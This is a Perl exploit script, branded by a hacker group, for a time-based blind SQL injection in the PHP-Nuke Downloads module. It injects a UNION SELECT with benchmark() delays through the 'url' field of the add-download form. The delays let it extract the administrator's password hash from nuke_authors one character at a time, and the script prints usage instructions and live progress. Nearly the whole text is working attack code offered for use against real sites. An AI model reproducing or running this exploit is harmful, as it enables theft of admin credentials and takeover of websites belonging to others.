#!/usr/bin/perl #[0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit #Created: 2011.01.04 #Author/s: Dr.0rYX and Cr3w-DZ #Greetings To: WWW.gaza-hacker.net #################################################################################################### # _______ ___________.__ ___________ .__ # # ____ \ _ \______\__ ___/| |__ _____ \_ _____/______|__| ____ _____ # # / \/ /_\ \_ __ \| | | | \ ______ \__ \ | __) \_ __ \ |/ ___\\__ \ # # | | \ \_/ \ | \/| | | Y \ /_____/ / __ \_| \ | | \/ \ \___ / __ \_ # # |___| /\_____ /__| |____| |___| / (____ /\___ / |__| |__|\___ >____ / # # \/ \/ \/ \/ \/ \/ \/ # # .__ __ __ # # ______ ____ ____ __ _________|__|/ |_ ___.__. _/ |_ ____ _____ _____ # # / ___// __ \_/ ___\| | \_ __ \ \ __< | | \ __\/ __ \\__ \ / \ # # \___ \\ ___/\ \___| | /| | \/ || | \___ | | | \ ___/ / __ \| Y Y \ # # /____ >\___ >\___ >____/ |__| |__||__| / ____| |__| \___ >____ /__|_| / # # \/ \/ \/ \/ \/ \/ \/ # # Pr!v8 Expl0iT AND t00l ** # # # # ALGERIAN HACKERS # #################################- NORTH-AFRICA SECURITY TEAM -##################################### use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Headers; use Time::HiRes; my $Victime = shift or &usage; my $Hash = ""; my ($Referer,$Time,$Response); my ($Start,$End); my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link my $Method = HTTP::Request->new(POST => $HostName.'modules.php?name=Downloads&d_op=Add'); my $Cookies = new HTTP::Cookies; my $UserAgent = new LWP::UserAgent( agent => 'Mozilla/5.0', max_redirect => 0, cookie_jar => $Cookies, default_headers => HTTP::Headers->new, ) or die $!; my $NAST = "http://www.gaza-hacker.net/"; my $DefaultTime = request($NAST); my $Post; sub Blind_SQL_Jnjection { my ($dec,$hex,$Victime) = @_; return "http://www.gaza-hacker.net/' UNION/**/SELECT IF(SUBSTRING(pwd,${dec},1)=CHAR(${hex}),benchmark(250000000,CHAR(0)),0) FROM nuke_authors WHERE aid='${Victime}"; } for(my $I=1; $I<=32; $I++){ #N Hash characters for(my $J=0; $J<=15; $J++){ #0 -> F $Post = Blind_SQL_Jnjection($I,$chars[$J],$Victime); $Time = request($Post); sleep(3); refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I); if ($Time > 4) { $Time = request($Post); refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I); if ($Time > 4) { syswrite(STDOUT,chr($chars[$J])); $Hash .= chr($chars[$J]); $Time = request($Post); refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I); last; } } } if($I == 1 && length $Hash < 1 && !$Hash){ print " * Exploit Failed *\n"; print " -------------------------------------------------------- \n"; exit; } if($I == 32){ print " * Exploit Successfully Executed *\n"; print " -------------------------------------------------------- \n"; system("pause"); } } sub request{ $Post = $_[0]; $Start = Time::HiRes::time(); my $Response = $UserAgent->post($HostName.'modules.php?name=Downloads&d_op=Add', { title => "Dr.0rYX and Cr3w-DZ", url => $Post, description => "NAST Crew", auth_name => "Dr.0rYX and Cr3w-DZ", email => "sniper-dz\@hotmail.de and crew\@hotmail.de", filesize => "1024", version => "1", homepage => "http://www.gaza-hacker.net/", d_op => "Add" }, Referer => $HostName.'modules.php?name=Downloads&d_op=Add'); $Response->is_success() or die "$HostName : ", $Response->message, "\n"; $End = Time::HiRes::time(); $Time = $End - $Start; return $Time; } sub usage { system("cls"); { print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n"; print " -------------------------------------------------------- \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl [victime] *\n"; print " -------------------------------------------------------- \n"; print " * Powered By Dr.0rYX and Cr3w-DZ *\n"; print " * www.gaza-hacker.net - NAST CREW *\n"; print " ------------------------------------------------------- \n"; }; exit; } sub refresh { system("cls"); { print " \n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploit\n"; print " -------------------------------------------------------- \n"; print " * USAGE: *\n"; print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n"; print " * perl name_exploit.pl [victime] *\n"; print " -------------------------------------------------------- \n"; print " * Powered By Dr.0rYX and Cr3w-DZ *\n"; print " * www.gaza-hacker.net - NAST CREW *\n"; print " ------------------------------------------------------- \n"; }; print " * Victime Site: " . $_[0] . "\n"; print " * Default Time: " . $_[1] . " seconds\n"; print " * BruteForcing Hash: " . chr($_[2]) . "\n"; print " * BruteForcing N Char Hash: " . $_[5] . "\n"; print " * SQL Time: " . $_[4] . " seconds\n"; print " * Hash: " . $_[3] . "\n"; } #NORTH-AFRICA SECURITY TEAM